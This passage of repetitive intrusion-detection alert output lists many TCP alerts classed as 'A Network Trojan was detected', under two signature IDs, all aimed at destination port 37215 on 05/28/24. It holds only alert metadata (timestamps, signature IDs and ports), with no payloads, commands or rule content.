          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.911207
          SID:2829579
          Source Port:49262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.325855
          SID:2829579
          Source Port:57940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.698453
          SID:2829579
          Source Port:36576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.191790
          SID:2829579
          Source Port:38122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.843384
          SID:2835222
          Source Port:51768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214468
          SID:2829579
          Source Port:38216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.210679
          SID:2835222
          Source Port:48088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.593011
          SID:2829579
          Source Port:47810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.975012
          SID:2835222
          Source Port:35922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.440037
          SID:2835222
          Source Port:56418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.182648
          SID:2835222
          Source Port:35098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.512548
          SID:2829579
          Source Port:39552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.114472
          SID:2835222
          Source Port:43774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.781219
          SID:2835222
          Source Port:34922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.463475
          SID:2829579
          Source Port:40968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.879044
          SID:2829579
          Source Port:41538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.864198
          SID:2835222
          Source Port:59144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.977400
          SID:2835222
          Source Port:60108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.015923
          SID:2835222
          Source Port:49518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.143137
          SID:2829579
          Source Port:48482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.690201
          SID:2835222
          Source Port:45768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.553952
          SID:2835222
          Source Port:43728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.301202
          SID:2835222
          Source Port:46834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.878037
          SID:2829579
          Source Port:40712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322235
          SID:2829579
          Source Port:50716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.774324
          SID:2835222
          Source Port:55468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.838686
          SID:2835222
          Source Port:34128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.066232
          SID:2829579
          Source Port:43684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.332195
          SID:2835222
          Source Port:54048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.171872
          SID:2829579
          Source Port:46158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.236881
          SID:2835222
          Source Port:38208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.236875
          SID:2835222
          Source Port:57832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.303038
          SID:2835222
          Source Port:46942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.215359
          SID:2835222
          Source Port:57914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.666209
          SID:2835222
          Source Port:57890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.486506
          SID:2835222
          Source Port:41058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.590718
          SID:2829579
          Source Port:56552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.330156
          SID:2829579
          Source Port:50856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.295355
          SID:2835222
          Source Port:45402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.543182
          SID:2835222
          Source Port:45804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.268628
          SID:2835222
          Source Port:49006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.655905
          SID:2835222
          Source Port:36782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.943475
          SID:2835222
          Source Port:41298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.482754
          SID:2835222
          Source Port:45936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.202948
          SID:2829579
          Source Port:39246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.042427
          SID:2829579
          Source Port:42876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.606905
          SID:2829579
          Source Port:36812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.095859
          SID:2835222
          Source Port:50336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.841461
          SID:2835222
          Source Port:57100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.201940
          SID:2829579
          Source Port:44540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.892682
          SID:2835222
          Source Port:38124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941698
          SID:2829579
          Source Port:48808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.177736
          SID:2829579
          Source Port:35110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.138522
          SID:2835222
          Source Port:41632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.307235
          SID:2835222
          Source Port:51532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.464078
          SID:2835222
          Source Port:48720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.156202
          SID:2835222
          Source Port:40732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.727855
          SID:2829579
          Source Port:56882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.537449
          SID:2829579
          Source Port:52660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.287880
          SID:2835222
          Source Port:53252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.815773
          SID:2835222
          Source Port:33882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797164
          SID:2829579
          Source Port:41406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.551245
          SID:2829579
          Source Port:59918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.198277
          SID:2835222
          Source Port:39386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.228362
          SID:2829579
          Source Port:38220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.088098
          SID:2835222
          Source Port:45652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.669154
          SID:2829579
          Source Port:60474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.464440
          SID:2835222
          Source Port:35388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.793362
          SID:2829579
          Source Port:57732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.887288
          SID:2829579
          Source Port:35630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.605616
          SID:2835222
          Source Port:46758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.170183
          SID:2835222
          Source Port:49484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.845740
          SID:2835222
          Source Port:58904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.668456
          SID:2835222
          Source Port:37114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.267613
          SID:2829579
          Source Port:46142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923488
          SID:2835222
          Source Port:35424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.893547
          SID:2835222
          Source Port:40018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.684454
          SID:2835222
          Source Port:46988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.666544
          SID:2835222
          Source Port:34590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.557327
          SID:2835222
          Source Port:41108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.597437
          SID:2835222
          Source Port:58284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102346
          SID:2829579
          Source Port:43090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.808966
          SID:2829579
          Source Port:44144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.964397
          SID:2835222
          Source Port:37228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.979703
          SID:2835222
          Source Port:59238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.994994
          SID:2835222
          Source Port:51434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.425117
          SID:2829579
          Source Port:36390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.630448
          SID:2835222
          Source Port:34520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.439809
          SID:2829579
          Source Port:45626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.510368
          SID:2829579
          Source Port:42634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.873566
          SID:2829579
          Source Port:50828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.904033
          SID:2829579
          Source Port:39634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.069528
          SID:2835222
          Source Port:47596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.156467
          SID:2829579
          Source Port:57334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.205314
          SID:2829579
          Source Port:41102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.152504
          SID:2829579
          Source Port:43112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.633421
          SID:2835222
          Source Port:51530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.067566
          SID:2829579
          Source Port:49278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.609737
          SID:2835222
          Source Port:45428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.741809
          SID:2829579
          Source Port:34458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.536725
          SID:2829579
          Source Port:56784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923215
          SID:2835222
          Source Port:40806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.205349
          SID:2835222
          Source Port:56922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.230340
          SID:2829579
          Source Port:54378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195595
          SID:2835222
          Source Port:39508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.526735
          SID:2829579
          Source Port:45666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.105528
          SID:2835222
          Source Port:46414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.668860
          SID:2835222
          Source Port:60796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.328057
          SID:2829579
          Source Port:48096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.659077
          SID:2829579
          Source Port:38710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.868690
          SID:2829579
          Source Port:48240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.201995
          SID:2829579
          Source Port:39478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.685652
          SID:2829579
          Source Port:36452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.590667
          SID:2829579
          Source Port:60912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.858299
          SID:2835222
          Source Port:38138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.123907
          SID:2829579
          Source Port:54076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.658988
          SID:2829579
          Source Port:36338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.324288
          SID:2835222
          Source Port:33444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528248
          SID:2829579
          Source Port:39508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.842459
          SID:2835222
          Source Port:46710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.402026
          SID:2835222
          Source Port:43530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.186012
          SID:2829579
          Source Port:43072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711180
          SID:2829579
          Source Port:35320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.594681
          SID:2829579
          Source Port:46738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.591746
          SID:2835222
          Source Port:36706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.170704
          SID:2829579
          Source Port:59748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.215793
          SID:2835222
          Source Port:51714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272741
          SID:2835222
          Source Port:41774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.796352
          SID:2835222
          Source Port:33092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.105525
          SID:2829579
          Source Port:48536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.215541
          SID:2829579
          Source Port:39106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.090417
          SID:2835222
          Source Port:53080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.783024
          SID:2835222
          Source Port:38458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.593189
          SID:2835222
          Source Port:49028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.846877
          SID:2829579
          Source Port:53640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.087642
          SID:2829579
          Source Port:33884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.267727
          SID:2829579
          Source Port:47148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528985
          SID:2829579
          Source Port:59532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.463489
          SID:2829579
          Source Port:42002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.804103
          SID:2835222
          Source Port:55686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.155630
          SID:2829579
          Source Port:55640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.594873
          SID:2835222
          Source Port:57650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.338423
          SID:2835222
          Source Port:40116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.981502
          SID:2829579
          Source Port:54016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.431528
          SID:2835222
          Source Port:49654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.728487
          SID:2835222
          Source Port:54136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.975293
          SID:2829579
          Source Port:58726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.886218
          SID:2835222
          Source Port:37290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.090334
          SID:2835222
          Source Port:50224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.332191
          SID:2829579
          Source Port:50846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.780833
          SID:2835222
          Source Port:52684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.267738
          SID:2829579
          Source Port:44602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.498807
          SID:2835222
          Source Port:35420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.426469
          SID:2829579
          Source Port:42042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.223960
          SID:2829579
          Source Port:59296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.893821
          SID:2835222
          Source Port:45456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.651175
          SID:2829579
          Source Port:58066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.975428
          SID:2829579
          Source Port:50020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797212
          SID:2835222
          Source Port:58452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.892732
          SID:2829579
          Source Port:44320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.464198
          SID:2835222
          Source Port:39624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.846285
          SID:2835222
          Source Port:38904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.976661
          SID:2829579
          Source Port:43448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.402449
          SID:2829579
          Source Port:59782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195243
          SID:2829579
          Source Port:33146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.592543
          SID:2829579
          Source Port:44700
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.216173
          SID:2829579
          Source Port:55280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.795020
          SID:2835222
          Source Port:43846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.044054
          SID:2835222
          Source Port:34662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.064406
          SID:2829579
          Source Port:50366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594977
          SID:2835222
          Source Port:54660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.103036
          SID:2829579
          Source Port:34178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.327915
          SID:2835222
          Source Port:53344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.763945
          SID:2835222
          Source Port:53116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923488
          SID:2829579
          Source Port:39380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.780779
          SID:2835222
          Source Port:48972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.850940
          SID:2829579
          Source Port:44404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.105505
          SID:2829579
          Source Port:42012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.066054
          SID:2829579
          Source Port:57886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.530055
          SID:2835222
          Source Port:38820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.235979
          SID:2829579
          Source Port:47462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.140176
          SID:2835222
          Source Port:58694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272328
          SID:2835222
          Source Port:33170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196792
          SID:2835222
          Source Port:58410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.534712
          SID:2835222
          Source Port:43304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.170641
          SID:2829579
          Source Port:55892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.226021
          SID:2829579
          Source Port:53648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.807628
          SID:2835222
          Source Port:56550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.144968
          SID:2829579
          Source Port:33124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.978893
          SID:2829579
          Source Port:52424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711127
          SID:2835222
          Source Port:56536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.342015
          SID:2835222
          Source Port:34446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.927814
          SID:2829579
          Source Port:34726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.399940
          SID:2829579
          Source Port:48166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.475931
          SID:2835222
          Source Port:57278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.067212
          SID:2835222
          Source Port:49284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.164905
          SID:2835222
          Source Port:42334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
